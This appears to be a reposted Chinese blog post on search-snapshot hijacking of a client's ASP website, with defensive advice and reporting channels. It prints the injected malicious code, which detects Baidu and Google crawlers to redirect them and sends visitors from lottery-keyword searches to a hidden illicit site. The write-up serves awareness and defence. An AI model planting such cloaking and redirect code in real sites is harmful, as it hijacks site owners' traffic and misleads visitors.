Categories

Tags

百度快照是如何被黑客篡改的

写本篇文章的目的在于揭露一种黑客作弊的手段,也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第1张

前几日,我的客户电话说自己的百度排名没有了,查询下竟然百度标签显示的内容是一家违禁词平台的网站内容。 我知道网站被黑客加入了非法代码,恶意篡改了百度快照。(截图如下)

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第2张

查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第3张

1、黑客是如何修改百度快照的呢?

我进行了排查,客户的网站是使用asp源码开发的。发现有个文件被黑客写入了一段代码。

路径:Inc文件夹—SysProduct.asp文件里面最底下添加了如下代码:

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第4张

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"(跳转的网站,引导百度抓取的内容)

else

'

Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';(目标网站)window.adworkergo='ad_app6'}else{}</script>"

end if

%>

黑客设置的这串代码导致百度爬虫抓取网页的时候,直接抓取越过客户网站抓取了跳转网站内容,导致百度快照里面显示的是别的内容。使得客户本来排名首页的网站直接被百度屏蔽了。造成了客户很大的损失。

2、那么黑客是如何进入后台的呢?

黑客要进入后台,必须知道FTP账户和密码,以及IP地址。

造成的原因有如下几种:

1)一方面是FTP密码设置的时候比较简单化,很容易被利用软件破解掉,

2)另一方面选择便宜的空间也是一种隐患。因为空间IP以及用户名是很难被知道的,除非有人提供。

3、网站被黑之后,你如何追查黑客的来源?

方法比较简单,就是查询你跳转的目标网站的域名信息。一般情况下,都是一些小型的站长开发的赚钱网站,通过查询域名信息你可以获知该域名的归属人是谁,他有可能就是黑你网站的人。

如果是比较大型的网站利用外包的方式进行推广,那么你也可以得知负责人,给百度或者是网络警察举报一下,该网站存在恶意攻击修改内容的行为,毕竟它也有一定得责任。

通过中国万网Whois域名查询:比如我客户跳转的违禁词网站的域名信息如下:

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第5张

1)第一个是:注册人

2)第二个是:联系电话

3)第三个是:联系邮箱

基本上你联系注册人就可以解决问题。如果对你客户造成的损失太大的话,建议你通过以下方式进行维权:

违法和不良信息举报中心:http://net.china.cn/

12321网络不良与垃圾信息举报受理中心:http://www.12321.cn/

国家互联网应急中心网络安全举报中心:http://www.cert.org.cn/

中国反钓鱼网站联盟认定及处理流程: http://www.cnnic.cn/

公安部信息网络安全报警网站:http://www.cyberpolice.cn/wfjb/

中国扫黄打非网:http://www.shdf.gov.cn/

北京市公安局网络违法犯罪举报网站:http://www.bj.cyberpolice.cn/index.jsp

希望本篇文章对你防黑有帮助。

感谢【网牛天下】的精彩分享

来源:卢松松博客


 Public @ 2018-08-25 15:37:31

网站使用HTTPS有什么优势?HTTPS的缺点

HTTPS是HTTP+SSL,HTTPS经过SSL证书进行加密,是HTTP的加密版本。经过SSL加密向服务器传输的数据,比如用户名和密码都是经过加密,无法被窃取和篡改。现在很多大型网站会采用HTTPS,广泛用于电商网站、支付、金融等高私密性网站。网站使用HTTPS有什么优势?安全性方面:1、HTTPS协议可以认证用户和服务器,保证客户端和服务器端之间的数据传输安全。2、HTTPS通过SSL证书+H

 Public @ 2011-07-11 15:56:13

HTTPS认证工具解读

HTTPS认证工具通常用于验证HTTPS连接的安全性,以保护用户隐私和数据安全。以下是常见的HTTPS认证工具解读: 1. SSL证书:一个数字证书,以保证网站的安全性。当用户浏览HTTPS网站时,服务器会发送SSL证书,证书包含了网站的公钥、证书有效期、签发机构等信息,用户浏览器会根据证书验证服务器身份和网站的合法性。 2. TLS:传输层安全协议,是一种加密通信协议,主要用于保证数据在传输

 Public @ 2023-05-29 08:00:14

网站被恶意克隆、镜像及侵权等如何举报?

如果您的网站被恶意克隆、镜像或侵权,您可以采取以下措施举报: 1. 向网站托管商或域名注册商投诉,要求其关闭被克隆、镜像或侵权的网站。 2. 向各大搜索引擎反馈被克隆、镜像或侵权的页面,要求其尽快移除。 3. 向公安机关报案,提供证据,让其介入调查。 4. 采取法律手段,通过律师向侵权方发出警告信或起诉。 在举报时需要提供充分的证据并有序呈现,以便机构进行核实处理。同时,为避免类似情况再

 Public @ 2023-06-14 00:50:38

更多您感兴趣的搜索

0.476110s